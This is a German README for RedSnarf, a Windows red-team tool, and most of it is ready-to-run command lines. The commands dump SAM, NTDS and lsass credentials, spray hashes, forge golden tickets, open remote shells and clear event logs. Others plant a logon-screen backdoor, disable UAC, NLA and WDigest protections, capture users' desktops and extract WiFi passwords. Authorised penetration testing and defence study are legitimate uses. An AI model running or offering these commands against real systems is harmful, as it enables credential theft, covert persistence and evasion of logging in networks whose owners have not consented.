
RedSnarf ist ein Pen-Test-/Red-Teaming-Tool für Windows-Umgebungen.
______ .____________ _____
______ \ ____ | / / ____ _____ ____/ \
| // __ \ / __ |_ \ / \ \ __ \ __\
| | \ __// // |/ \ | / __ | | /| |
|| /_ >_ /_______ /_| (__ /| ||
/ / / / / /
[email protected]
@redsnarf
RedSnarf ist ein Penetrationstest-/Red-Teaming-Tool von Ed Williams zum Extrahieren von Hashes und Anmeldedaten von Windows-Workstations, Servern und Domänencontrollern unter Verwendung von OpSec-sicheren Techniken.
Siehe unseren YouTube-Kanal für Videos https://www.youtube.com/channel/UCDGWRxpHo6d8y6qIeMAXnxQ
RedSnarf-Funktionen umfassen:
• Abruf lokaler SAM-Hashes
• Aufzählung von Benutzern, die mit erweiterten Systemberechtigungen ausgeführt werden, und deren entsprechenden lsa-Geheimnissen-Passwort;
• Abruf von MS-Cache-Anmeldedaten;
• Pass-the-Hash;
• Schnelles Erkennen schwacher und erratbarer Benutzername/Passwort-Kombinationen (Standard: administrator/Password01);
• Die Fähigkeit, Hashes über einen Bereich hinweg abzurufen;
• Hash-Spraying -
Credsfile akzeptiert eine Mischung aus pwdump, fgdump und Klartext-Benutzername und Passwort, getrennt durch ein Leerzeichen;
• Lsass-Dump zur Offline-Analyse mit Mimikatz;
• Abfall von Domänencontroller-Hashes mit NTDSUtil und Abruf von NTDS.dit zur lokalen Analyse;
• Abfall von Domänencontroller-Hashes mittels der drsuapi-Methode;
• Abruf des Skripte- und Richtlinien-Ordners von einem Domänencontroller und Durchsuchen nach 'password' und 'administrator';
• Fähigkeit, cpassword-Hashes zu entschlüsseln;
• Fähigkeit, eine Shell auf einem entfernten Rechner zu starten;
• Die Möglichkeit, die Ereignisprotokolle (Anwendung, Sicherheit, Setup oder System) zu löschen; (Nur interne Version)
• Ergebnisse werden pro Host zur Analyse gespeichert.
• RDP auf einem entfernten Rechner aktivieren/deaktivieren.
• RDP-Port von 3389 auf 443 auf einem entfernten Rechner ändern.
• NLA auf einem entfernten Rechner aktivieren/deaktivieren.
• Finden, wo Benutzer auf entfernten Rechnern angemeldet sind.
• Hintertür für Windows-Anmeldebildschirm
• UAC auf einem entfernten Rechner aktivieren/deaktivieren.
• Stealth-Mimikatz hinzugefügt.
• Analyse von Domänen-Hashes
• Fähigkeit zu bestimmen, welche Konten aktiviert/deaktiviert sind
• Bildschirmfoto des Desktops eines entfernt angemeldeten aktiven Benutzers erstellen
• Desktop eines entfernt angemeldeten aktiven Benutzers aufzeichnen
• Windows-CPassword entschlüsseln
• WinSCP-Passwort entschlüsseln
• Benutzer-SPNs abrufen
• WIFI-Passwörter von entfernten Rechnern abrufen
Anforderungen:
Impacket v0.9.16-dev - https://github.com/CoreSecurity/impacket.git
CredDump7 - https://github.com/Neohapsis/creddump7
Lsass-Abruf mit procdump - https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
Netaddr (0.7.12) - pip install netaddr
Termcolor (1.1.0) - pip install termcolor
iconv - verwendet zum lokalen Parsen von Mimikatz-Informationen
Hilfe anzeigen
./redsnarf.py -h
./redsnarf.py --help
Lokale Hashes von einem einzelnen Rechner mit schwachen lokalen Anmeldedaten abrufen und das Sicherheits-Ereignisprotokoll löschen
./redsnarf.py -H ip=10.0.0.50 -uC security
Lokale Hashes von einem einzelnen Rechner mit schwachen lokalen Anmeldedaten abrufen und das Anwendungs-Ereignisprotokoll löschen
./redsnarf.py -H ip=10.0.0.50 -uC application
Lokale Hashes von einem einzelnen Rechner mit lokalen Administrator-Anmeldedaten abrufen
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d .
Lokale Hashes von einem einzelnen Rechner mit Domänenadministrator-Anmeldedaten abrufen
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com
Hashes über einen Netzwerkbereich mit lokalen Administrator-Anmeldedaten abrufen
./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d .
Hashes über einen Netzwerkbereich mit Domänenadministrator-Anmeldedaten abrufen
./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com
Hashes über einen Netzwerkbereich mit Domänenadministrator-Anmeldedaten abrufen
./redsnarf.py -H file=targets.txt -u administrator -p Password01 -d yourdomain.com
Hashes über einen Netzwerkbereich sprayen
./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d .
Hashes über einen Netzwerkbereich mit Domänen-Login abrufen
./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d yourdomain.com
Schnell Anmeldedaten überprüfen
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password1 -d . -cQ y
Schnell eine Datei mit Benutzernamen (-hS) und einem generischen Passwort (-hP) überprüfen
./redsnarf.py -H ip=10.0.0.1 -hS /pfad/zu/benutzernamen.txt -hP ZuTestendesPasswort -cQ y
Hashes mit der drsuapi-Methode abrufen (am schnellsten)
Diese Methode unterstützt ein optionales Flag -q y, das LDAP abfragt und ausgibt, ob Konten aktiv oder deaktiviert sind
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hI y (-hQ y)
Hashes mit NTDSUtil abrufen
Diese Methode unterstützt ein optionales Flag -q y, das LDAP abfragt und ausgibt, ob Konten aktiv oder deaktiviert sind
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hN y (-hQ y)
Golden-Ticket-Generierung
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hT y
Den Ordner „Richtlinien und Skripte“ von einem Domänencontroller kopieren und nach „password“ und „administrator“ durchsuchen
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -uP y
CPassword entschlüsseln
./redsnarf.py -uG cpassword
Benutzer finden – Live
/redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eL benutzername
Benutzer finden – Offline (durchsucht bereits heruntergeladene Informationen)
/redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eO benutzername
NT AUTHORITY\SYSTEM-Aufgabenliste anzeigen
/redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eT y
Bildschirmfoto des Desktops eines entfernt angemeldeten aktiven Benutzers erstellen
/redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eS y
Eine Shell auf einem Rechner mit lokalen Administrator-Anmeldedaten starten
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -uD y
Eine Shell auf einem Rechner mit Domänenadministrator-Anmeldedaten starten
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uD y
Eine Kopie von lsass zur Offline-Analyse mit Mimikatz auf einem Rechner mit lokalen Administrator-Anmeldedaten abrufen
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -hL y
Stealth-Mimikatz ausführen – diese Option startet einen Webserver, um ein PowerShell-Skript bereitzustellen. Dieses ist auf der Maschine verschlüsselt und codiert; Daten berühren keine Festplatte. Anmeldedaten werden herausgefiltert, in einem leicht lesbaren Format ausgegeben und auf dem Bildschirm angezeigt.
./redsnarf.py -H ip=192.168.198.162 -u administrator -p Password01 -cS y -hR y
Benutzerdefinierten Befehl ausführen
Beispiel 1
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'net user'
Beispiel 2 – Doppelte Anführungszeichen müssen mit \ maskiert werden
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'dsquery group -name "domain admins" | dsget group -members -expand'
Lokale Zugriffstoken-Richtlinie
Erstellt eine Batch-Datei lat.bat, die Sie auf den entfernten Rechner kopieren und ausführen können; diese ändert die Registrierung und aktiviert oder deaktiviert die lokale Zugriffstoken-Richtlinie.
./redsnarf.py -rL y
Wdigest
UseLogonCredential-Wdigest-Registrierungswert auf einem Rechner mit Domänenadministrator-Anmeldedaten aktivieren
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW e
UseLogonCredential-Wdigest-Registrierungswert auf einem Rechner mit Domänenadministrator-Anmeldedaten deaktivieren
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW d
UseLogonCredential-Wdigest-Registrierungswert auf einem Rechner mit Domänenadministrator-Anmeldedaten abfragen
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW q
UAC
UAC-Registrierungswert auf einem Rechner mit Domänenadministrator-Anmeldedaten aktivieren
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU e
UAC-Registrierungswert auf einem Rechner mit Domänenadministrator-Anmeldedaten deaktivieren
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU d
UAC-Registrierungswert auf einem Rechner mit Domänenadministrator-Anmeldedaten abfragen
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU q
Hintertür – Hintertür für Windows-Anmeldebildschirm – Zum Aktivieren linke Umschalttaste + linke Alt-Taste + Bildschirm drucken drücken
Hintertür-Registrierungswert auf einem Rechner mit Domänenadministrator-Anmeldedaten aktivieren
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB e
Hintertür-Registrierungswert auf einem Rechner mit Domänenadministrator-Anmeldedaten deaktivieren
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB d
Hintertür-Registrierungswert auf einem Rechner mit Domänenadministrator-Anmeldedaten abfragen
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB q
AutoLogon
Windows-AutoLogon-Registrierungswert auf einem Rechner mit Domänenadministrator-Anmeldedaten aktivieren
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA e
Windows-AutoLogon-Registrierungswert auf einem Rechner mit Domänenadministrator-Anmeldedaten deaktivieren
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA d
Windows-AutoLogon-Registrierungswert auf einem Rechner mit Domänenadministrator-Anmeldedaten abfragen
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA q
Benutzersitzung auf einem entfernten Rechner mit Domänenadministrator-Anmeldedaten sperren
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uL y
RDP auf einem Rechner mit Domänenadministrator-Anmeldedaten aktivieren ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR e
RDP auf einem Rechner mit Domänenadministrator-Anmeldedaten deaktivieren
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR d
RDP-Status auf einem Rechner mit Domänenadministrator-Anmeldedaten abfragen
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR q
RDP-Port von 3389 auf 443 ändern – RDP-Port auf einem Rechner mit Domänenadministrator-Anmeldedaten auf 443 ändern
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT e
RDP-Port auf den Standard 3389 auf einem Rechner mit Domänenadministrator-Anmeldedaten ändern
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT d
RDP-Portwert auf einem Rechner mit Domänenadministrator-Anmeldedaten abfragen
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT q
Multi-RDP mit Mimikatz aktivieren
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uR y
RDP SingleSessionPerUser auf einem Rechner mit Domänenadministrator-Anmeldedaten aktivieren
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM e
RDP SingleSessionPerUser auf einem Rechner mit Domänenadministrator-Anmeldedaten deaktivieren
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM d
RDP SingleSessionPerUser-Status auf einem Rechner mit Domänenadministrator-Anmeldedaten abfragen
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM q
NLA auf einem Rechner mit Domänenadministrator-Anmeldedaten aktivieren
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN e
NLA auf einem Rechner mit Domänenadministrator-Anmeldedaten deaktivieren
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN d
NLA-Status auf einem Rechner mit Domänenadministrator-Anmeldedaten abfragen
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN q